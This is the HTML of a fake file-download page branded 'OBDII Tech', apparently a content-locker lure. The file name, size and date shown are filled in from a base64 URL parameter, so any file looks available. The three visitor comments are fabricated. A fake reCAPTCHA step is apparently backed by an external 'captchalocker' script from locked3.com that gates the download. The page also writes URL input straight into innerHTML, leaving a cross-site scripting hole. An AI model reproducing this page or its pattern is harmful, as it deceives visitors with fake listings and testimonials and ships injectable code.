<!DOCTYPE HTML>
<html lang="en-US">
<head>
<title>OBDII Tech File Download</title>    
<meta content='width=device-width, initial-scale=1 maximum-scale=1' name='viewport' />
<meta name="robots" content="noindex">
<style>

@import url(https://fonts.googleapis.com/css?family=Nunito:400,700,300); 

body{
    font-family: 'Nunito', sans-serif;
background:url(https://i.imgur.com/5F8Iumv.png);
padding:10px;
}
.row {
    display: flex;
}
/* Create two equal columns that sits next to each other */
.column1 {
    max-width:150px;
    min-width:100px;
}
.column2 {
    padding: 20px;
    overflow:hidden;
text-overflow:ellipsis;
}
.link_a:link{
width:100%;
}
.dl_button{
background:#66CC33;
color:#fff;
border:0;
width:100%;
max-width:250px
}
.dl_button:hover{
background:#66CC33;
color:#fff;
border:0;
width:100%;
max-width:250px
}
#rock {
    background: white;
    border: 10px solid #eee;
    padding: 10px;
    max-width:600px;
    margin:10px auto;
    border-radius:5px;
}
#comment {
    width: 100%;
    padding: 8px;
    border: 1px solid #ccc;
    border-radius: 5px;
    margin: 5px auto;
}
#comment:focus {
    outline: none;
}
#post {
    background: #3F5B9A;
    color: #fff;
    border: 1px solid #2E4B89;
    border-radius: 3px;
    padding: 3px;
    font-size: 12px;
    width: 50px;
    font-weight: bold;
    float: right;
}
#post:focus {
    outline: none;
}
#check {
    margin: 5px;
    color: #ccc 
}
p {
    margin: 1px 
}
#name {
    color: #3B5998;
    font-weight: bold;
    cursor: pointer;
}
#message {
    color: #000 
}
#soci {
    font-size: 14px;
    margin-top: 5px;
}
#link-a {
    cursor: pointer;
    color: #3B5998 
}
#link-a:hover {
    text-decoration: underline 
}
#load-more {
    Background: #5890FF;
    color: white;
    border: 0px;
    width: 100%;
    padding: 15px;
    border-radius: 2px;
    max-width: 700px;
}
#load-more:focus {
    outline: none;
}
#hidden {
    display: none;
}
#profile {
    width: 50px;
    height: 50px;
}

.button {
display: inline-block;
margin: 0.75rem;
padding: 0.75rem 1.5rem;
border: none;
border-radius: 0.1875rem;
outline: none;
background-color: tomato;
color: white;
font-family: inherit;
font-size: 1.25em;
font-weight: 400;
line-height: 1.5rem;
text-decoration: none;
text-align: center;
cursor: pointer;
-webkit-transition: all 150ms ease-out;
transition: all 150ms ease-out;
}
.button:focus, .button:hover {
background-color: #ff7359;
box-shadow: 0 0 0 0.1875rem white, 0 0 0 0.375rem #ff7359;
}
.button:active {
background-color: #f25e43;
box-shadow: 0 0 0 0.1875rem #f25e43, 0 0 0 0.375rem #f25e43;
-webkit-transition-duration: 75ms;
        transition-duration: 75ms;
}
.button.is-outlined {
border: 0.1875rem solid tomato;
background-color: transparent;
color: tomato;
}
.button.is-outlined:focus, .button.is-outlined:hover {
border-color: #ff7359;
color: #ff7359;
}
.button.is-outlined:active {
border-color: #f25e43;
color: #f25e43;
}
</style>

</head>

<body>
    <div style='background:#292929;position:relative;top:-20px;padding:10px;'>
        <center>
                <img style="border-radius: 25px;
                border: 2px solid #73AD21;" src="https://i.imgur.com/ptGV1we.png" >
        </center>
    </div>
    <div style='max-width:600px;padding:10px;margin:0px auto;background:#eee;border:10px solid #fff;box-shadow:0px 0px 3px #777'>
        <div class="row">
            <div class="column1">
                <img style='width:100%;max-width:80px;padding-top:50px' src='http://icons.iconarchive.com/icons/graphicloads/filetype/256/zip-icon.png' align="right">
            </div>
            <div class="column2">
                <ul>
                    <li><b>Filename :</b> <span id="filename"></span>.zip </li>
                    <li><b>Size :</b> <span id="size"></span>MB</li>
                    <li><b>Date Uploaded :</b> <span id="date"></span> months ago</li>
                    <li><b>File Type :</b> Zip</li>
                    <li><b>File Status :</b>
                        <font color='green'>Available</font>
                    </li>
                </ul>
            </div>
        </div>
        <center>
            <p><b>Powered by Google Recaptcha.</b> Please verify that you are a human before beginning download:</p>
            <br>
                <div data-captcha-enable="true"></div>
          <button class="button" disabled>> Begin Download</button>  
        </center>
        <br><br>
        <div style='background:#fff;padding:10px;'>
            <h2 style='font-size:1.3em'>About OBDII Tech</h2>
            Today, we are proud to offer a complete line of smart phone & PC-based scan tools, which cover all OBD-II compliant vehicles. Thanks to their open architecture, our tools are compatible with a wide range of apps and software, including free and open-source diagnostic programs, as well as different hardware platforms, including Apple, Android, and PC-based devices.
            <br><br>
From the very beginning, we made it our priority to make it easy for programmers to write software for our devices by providing documentation, source code, technical support, and OBD simulators. We work closely with many software developers across the globe, share ideas, and use their feedback to improve our scan tools.
<br><br>

Thank you for using our platform!
<br>
OBDII Tech Team
        </div>
    </div>
    <div>
        <div id="rock">
            <b>3 Comments</b>
            <div id="fblike" style="float:right"></div>
            <hr/>
            <input id="comment" style="max-width: 580px;" placeholder="Add a Comment..."></input>
            <button id="post">Post</button>
            <input id="check" type="checkbox">
            <font style="color:#aaa">Also Post on Facebook</font>
            </input>
            <div style="clear:both"></div>
            <br/>
            <table>
                <tr>
                    <td valign="top" style="padding:3px;">
                        <img id="profile" src="https://i.imgur.com/RzA1Eef.jpg">
                    </td>
                    <td valign="top" style="padding:3px;">
                        <p id="name">Stephen Daniels</p>
                        <p id="message">Thank you so much for posting this, I've been looking for this software everywhere!</p>
                        <p id="soci">
                            <font id="link-a">Like</font> ·
                            <font id="link-a">Reply</font>
                            <font style="color:#aaa">23 hours ago</font>
                        </p>
                    </td>
                </tr>
            </table>
            <br/>
            <table>
                <tr>
                    <td valign="top" style="padding:3px;">
                        <img id="profile" src="https://i.imgur.com/9bUgDBK.jpg">
                    </td>
                    <td valign="top" style="padding:3px;">
                        <p id="name">Mark Elliott</p>
                        <p id="message">I FINALLY FOUND THIS THANKS</p>
                        <p id="soci">
                            <font id="link-a">Like</font> ·
                            <font id="link-a">Reply</font>
                            <font style="color:#aaa">4 days ago</font>
                        </p>
                    </td>
                </tr>
            </table>
            <br/>
            <table>
                <tr>
                    <td valign="top" style="padding:3px;">
                        <img id="profile" src="https://i.imgur.com/oX6r0w7.png">
                    </td>
                    <td valign="top" style="padding:3px;">
                        <p id="name">Jack Veron</p>
                        <p id="message">Thank you. I got it.</p>
                        <p id="soci">
                            <font id="link-a">Like</font> ·
                            <font id="link-a">Reply</font>
                            <font style="color:#aaa">9 days ago</font>
                        </p>
                    </td>
                </tr>
            </table>
            <br/>
        </div>
        <script>
                var urlParams = new URLSearchParams(window.location.search);
                var params = atob(urlParams.get('file')).split('|');
                document.getElementById("filename").innerHTML = params[0];
                document.getElementById("size").innerHTML = params[1];
                document.getElementById("date").innerHTML = params[2];
                document.title = params[0] + " " + document.title;
                </script>
        <script src="//www.locked3.com/captchalocker/js/captcha.js.php?id=d36d8671605899a5aa98808e66246cb5"></script>

</body>
</html>
